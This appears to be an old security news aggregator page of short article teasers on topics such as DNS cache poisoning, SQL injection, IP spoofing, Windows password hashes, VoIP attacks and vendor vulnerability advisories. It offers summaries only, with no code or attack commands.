The Network Security. Org

The old problem of DNS cache poisoning has again reared its ugly head. While some would argue that the domain name system protocol is inherently vulnerable to this style of attack due to the weakness of 16bit transaction IDs, we cannot ignore the immediate threat while waiting for something better to come along. There are new attacks, which make DNS cache poisoning trivial to execute against a large number of nameservers running today. The purpose of this article is to shed light on these new attacks and recommend ways to defend against them.

Kernel hacking may not be hard, but it certainly could not be described as easy. That said, probably the biggest barrier to be overcome is a psycological one; having the confidence to get started, dive in and try things out. The next barrier to be faced is the lack of up to date, organised documentation, which hampers the efforts of even the most determined. Although there is actually quite a lot of information out there in books, web pages, newsgroups, mailing lists and the source code, it is all very disparate, dis-organised and on occasion even contradictory.

A complete tool set to attack the inherent protocol weaknesses of IPV6 and ICMP6, and includes an easy to use packet factory library.

IPV6 project. This code was inspired when I got into touch with IPv6, learned more and more about it and then found no tools to play (read: "hack") around with. First I tried to implement things with libnet, but then found out that the ipv6 implementation is only partial - and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.

Let's play pretend.

Pretend you've got a malicious insider on your network with a bone to pick. We'll call him Eddie. Perhaps Eddie is a consultant or even a salesperson. He might even come in during off hours to work his "security" shift. Regardless of what he does, he knows it is pretty simple to connect to someone's network and do just about anything he wants. Why? Default Windows settings, that's why.

Eddie doesn't know about the wonders of Group Policy Object (GPO) in Windows 2000 and later.

Buffer Overflows, the favorite target of malicious hackers and seemingly the biggest bug in off the shelf software, are a serious problem for security managers. Until recently, all that users of 32bit Windows systems could do was ensure each of their applications, including the OS, had all released security patches applied and then hope for the best. With the releases of Windows XP SP2 and Windows Server 2003 SP1 that all changed.

To study the proceedings and attacks from hackers, Honeypots are used. The idea thereby is, to put one or more special servers in a network . An aggressor; who cannot differentiate between genuine server/services and honeypots; sooner or later will be taken up the services offered by a Honeypot by his search for a safety gap. All his activities on the honeypot are loged thereby.

VoIP is here to stay. In fact many incumbent telecommunication carriers have started offering VoIP service for sometime and several new VoIP service providers have emerged. Aside from issues such as quality of service, the aspect of security, or lack thereof, is misunderstood by some of the VoIP service providers.

This purpose of this article is to discuss two of the most well known attacks that can be carried out in current VoIP deployments. The first attack demonstrates the ability to hijack a user's VoIP Subscription and subsequent communications.

Hackers have released new, more efficient malware that exploits an unpatched vulnerability in Internet Explorer.

Hackers have posted a new version of malicious software that will make it easier for them to exploit an unpatched vulnerability in Microsoft Corp.'s Internet Explorer (IE) browser. Based on a critical bug disclosed on March 22, the software was posted by hackers Friday to the Milw0rm.com web site.

Password and account lockout settings are designed to protect accounts and data in your organization by mitigating the threat of brute force guessing of account passwords. Settings in the Account Lockout and Password Policy nodes of the Default Domain policy settings enable account lockout and control how account lockout operates.

By familiarizing yourself with following software, you will not only have a better understanding of the vulnerabilities inherent in 802.11 networks, but you will also get a glimpse at how a hacker might exploit them. These tools can even be used when auditing your own network as we will see later.

Most serious hackers and network auditors use the open source operating system Linux as the platform from which they launch attacks and perform analysis.

Stopping modern attacks requires a modern approach to threat management. There is a growing mismatch between the level of protection your security measures are providing and the level needed to adequately protect your network. This white paper offers threat management solutions that are part of a multi tier suite of multifunction security products. This solution delivers maximum protection for your company by enabling pervasive coverage of your organization's IT environment with an optimal blend of reactive, proactive, and even predictive countermeasures.

Vulnerability assessments can help you find and fix WLAN weaknesses before attackers take advantage of them. But where do you start? What should you look for? Have you covered all the bases? This checklist will help to answer these questions.

1. Discover nearby wireless devices
You can't assess your WLAN's vulnerabilities if you don't know what's out there. Start by searching for wireless devices in and around your office, creating a foundation for subsequent steps.

In the news recently was an interesting story about MetaFisher (also known as Spy-Agent), a Trojan horse program that steals personal financial information. What was particularly interesting about the news report that I received from iDefense was screenshots of the control interface used by the MetaFisher bot network (botnet) operators. The images give a good idea of what goes on behind the scenes of botnets. If you've already looked at the news story that I posted on our Web site and didn't see the images, be sure to check it again, I added the images on Monday. You can link to the story from the MetaFisher news story below.

In the computer security ecosystem, the exploit is king. There is certain mystique about the lines of code that can vanquish a system and entice it into doing ones bidding. These same lines of code embody the power that the exploit writer wields in the electronic world; the power to influence and control the code execution path of a program that someone else wrote to serve some entirely different purpose.

Truth is made of numbers. Following this golden rule, Federico Biancuzzi interviewed Pete Herzog, founder of ISECOM and creator of the OSSTMM, to talk about the upcoming revision 3.0 of the Open Source Security Testing Methodology Manual. He discusses why we need a testing methodology, why use open source, the value of certifications, and plans for a new vulnerability scanner developed with a different approach than Nessus.

There are times when network security defenders need to compile exploit code. It is not unusual for more than a dozen new exploits against Windows and Linux machines to be released each day, and unfortunately, you can?t always trust the exploit author or security write ups.

First, many exploits don?t work as advertised. They either don?t work at all, only work some of the time, or only work in a much smaller subset of machines than originally advertised. The more exploit code that you test, the more you?ll see the truth of that statement.

Microsoft and security authorities are warning of a critical, unpatched script vulnerability in Internet Explorer 6 that can allow a hacker to take complete control of a Windows PC.

Experts have noted that, while the flaw is serious, those wishing to exploit it would have to entice users to click a link that takes them to a specially crafted Web site. In addition, for a PC to be affected, it must be running in administrator mode.

Nessus is a great tool designed to automate the testing and discovery of known security problems. Typically someone, a hacker group, a security company, or a researcher discovers a specific way to violate the security of a software product. The discovery may be accidental or through directed research; the vulnerability, in various levels of detail, is then released to the security community. Nessus is designed to help identify and solve these known problems, before a hacker takes advantage of them.

When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

In this article I am trying to explain what DDOS is and how it can be prevented. DDOS happens due to lack of security awareness of the network/server owners. On a daily basis we hear that a particular machine is under DDOS attack or NOC has unplugged the machine due to DDOS attack . So DDOS has become one of the common issues in this electronics world. DDOS is like a disease which doesn't have an antiviral developed. So we should be carefull while dealing with it . Never take it lightly. In this article i am trying to explain the steps/measures which will help us defend from DDOS attack ,up to a certain extend .

The latest survey from the DTI into the IT security of UK businesses has revealed that firms could be making themselves more vulnerable by using software-based two factor authentication rather than hardware tokens. Software tokens, where a small file is placed on a user's computer, have been adopted by many firms as a relatively cheap way of increasing security. Telecoms and technology companies are the highest adopters.

Because of the almost immediate two way nature of communication, many users feel that the use of instant messaging in the workplace leads to more effective and efficient workplace communications and, therefore, to higher productivity. As a result, IM is increasing in popularity in both professional and personal applications. However, as with most things Internet based, the increasing use of instant messaging has led to an associated increase in the number of security risks.

Developers of the open source GnuPG encryption software have reported a security flaw that could allow an attacker to sneak malicious code into a signed e-mail message. GnuPG, or Gnu Privacy Guard, is an open source version of the PGP (Profile, Products, Articles) encryption program used for encrypting data and creating digital signatures.

In its monthly patch release next Tuesday, Microsoft Corp. will issue one critical security bulletin concerning the Office suite and one bulletin on Windows that is rated important, the company said Thursday.

Also Tuesday, Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool, according to an advisory.

This article explains the widely underestimated security impact of the current lack of anti-spoofing measures on the Internet.

The Internet Protocol (IP) basically works with small portions of data called datagrams that contain a small header that is used for address information. This header contains two addresses:

* The destination address.
* The source address.

The first address determines where the datagram should go. The second address tells the destination where the datagram originated. In the handling of this second address there lies a problem.

The old problem of DNS cache poisoning has again reared its ugly head. While some would argue that the domain name system protocol is inherently vulnerable to this style of attack due to the weakness of 16bit transaction IDs, we cannot ignore the immediate threat while waiting for something better to come along. There are new attacks, which make DNS cache poisoning trivial to execute against a large number of nameservers running today. The purpose of this article is to shed light on these new attacks and recommend ways to defend against them.

This research paper presents a technical overview of the technique known as DNS cache snooping. Firstly,
a brief introduction to DNS is made followed by a discussion on common misconceptions regarding DNS sub systems. Then this relatively unknown technique is introduced, followed by a field study to assert the overall exposure of the Internet to this threat.

Also, a set of devised abuse scenarios that rely on cache
snooping is presented. This paper concludes with recommendations on how to reduce exposure to this security vulnerability, including proposed changes to the BIND DNS server implementation.

FrSIRT is reporting a brand new IE exploit targeted to XP SP0 (Gold) that appears to be patched in XP SP1 or higher, as well as W/2000 SP4. Still, there might be some folks running "Gold" (and especially W/2000 SP3 in the corporate world) ... More can be found at FrSIRT's site

Microsoft Internet Explorer "IsComponentInstalled()" Remote Stack Overflow Exploit

In this paper we are going to describe a kind of vulnerability that is known in the literature but also poor documented. In fact, the problem that is going to be analyzed can be reduced to a memory adjacent overwriting attack but usually it is obtained exploiting the last null byte of a buffer, hence we are going to show that the same result is still possible writing behind a buffer, under certain conditions. To fully understand the subject of this article it's necessary to describe the memory organization of running processes, then the memory adjacent overwrite attack, concluding with our analysis.

Cisco has reported a vulnerability in Cisco Aironet Wireless Access Points (AP) that work with Cisco IOS. The company has also announced that the update that fixes this vulnerability is now available.

A remote user, who has successfully associated with a Cisco IOS Wireless Access Point, could send specially-crafted and spoofed ARP messages to the management interface on the Access Point until physical memory has been completely exhausted. As a result, the target device would not be able to handle more network traffic and it would have to be manually shut down and restarted to start working again.

Instead of storing passwords in clear-text, Windows generates and stores user account passwords by using two different password representations, known as "hashes." The SAM file could be found in the folder c:\Windows\system32\config. However it cannot be accessed because the operating system locks the file. In this article I will discuss various methods that can be used to crack SAM and own the server.

An article on "Security Problems in the TCP/IP Protocol Suite" by S.M.Bellovin in 1989 initially explored IP Spoofing attacks . He described how Robert Morris, creator of the now infamous Internet Worm, figured out how TCP created sequence numbers and forged a TCP packet sequence.

This TCP packet included the destination address of his victim and using as IP spoofing attack Morris was able to obtain root access to his targeted system without a User ID or password.

The cloak-and-dagger capers of computer no-goodniks may seem like prime page-turning material, but most books on the subject have all the sex appeal of a VCR manual. The typical tome on digital security is a dreary assemblage of techno-jargon, geared toward the small clique that gets its hardcore jollies from Perl programming. Most laymen are asleep by Page 10, or at least yearning for their dog-eared copy of "Hannibal."

These days, the vast majority of administrators go to great lengths to protect the files on their network. Typically, elaborate firewalls are used to keep outsiders away from file servers. The files residing on those servers often lie behind an intricate permissions scheme and are often encrypted. Complex auditing mechanisms might even monitor access to files. The point is that in this day and age, most administrators take security very seriously.

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.

Cisco Systems on Friday released a security advisory about its VPN 3000 Series concentrators, which have a vulnerability that could allow a malicious user to send a crafted HTTP packet that could result in a denial-of-service attack.

The Windows Metafile (WMF) vulnerability, which emerged in the last week of 2005 and was resolved with a patch that Microsoft released off its regular patch schedule at the end of the first week of 2006, wasn't good news at all. But I managed to wring a good outcome out of the situation, since it allowed me to give some structure to our patch management process.

Research In Motion's BlackBerry Enterprise Server product may be vulnerable to denial-of-service attacks, according to a group of German hackers, called Phenoelit, that identifies security flaws.

Phenoelit found a problem in the way the server's BlackBerry Router handles Server Routing Protocol packets. An attacker could cause denial of service by sending "specially crafted" packets to the router, according to a vulnerability note posted on the U.S. Computer Emergency Readiness Team's Web site. The result could be disrupted communications between the BlackBerry Enterprise Server and BlackBerry devices, the note states.

MIT Kerberos 5 Multiple Arbitrary Code Execution Vulnerabilities: Two distinct but similar vulnerabilities in the Kerberos Distribution Center (KDC) could allow a remote attacker to execute code of their choice on the victim server, possibly resulting in total compromise of the Kerberos environment.

Vulnerabilities in a critical security system infrastructure such as a KDC should be addressed immediately, if for no other reason than to ensure the continued confidence in such a critical piece of infrastructure. Neither of these vulnerabilities appears to have exploit code produced, but given the high value of compromise, it?s unlikely that this will continue for very long.

Security remained foremost on the minds of IT leadership in 2005, and with good reason. The year saw a Microsoft research project discover the first so called zero day exploit; "identity theft," "phishing," and "spyware" became part of the popular lexicon; and the need grew for companies to treat any computer joining the network as hostile until proved secure. It's no wonder IT people at all levels sound paranoid.

Three organizations have teamed up to create a standard database of wireless threats: Every industry now seems to have its own threats database, and there are good reasons to standardize on names, behavior, and vendor responses. CERT started over 17 years ago to help assess Internet vulnerabilities; with years of wireless attacks in the wild, the Wireless Vulnerabilities and Exploits (WVE) site is overdue.

Network Chemistry, a wireless network security firm, is one of three sponsors, along with training and certification firm CWNP, and the Center for Advanced Defense studies. The editorial board includes highly credible members. The site perhaps softlaunched earlier, but the formal press release went out today.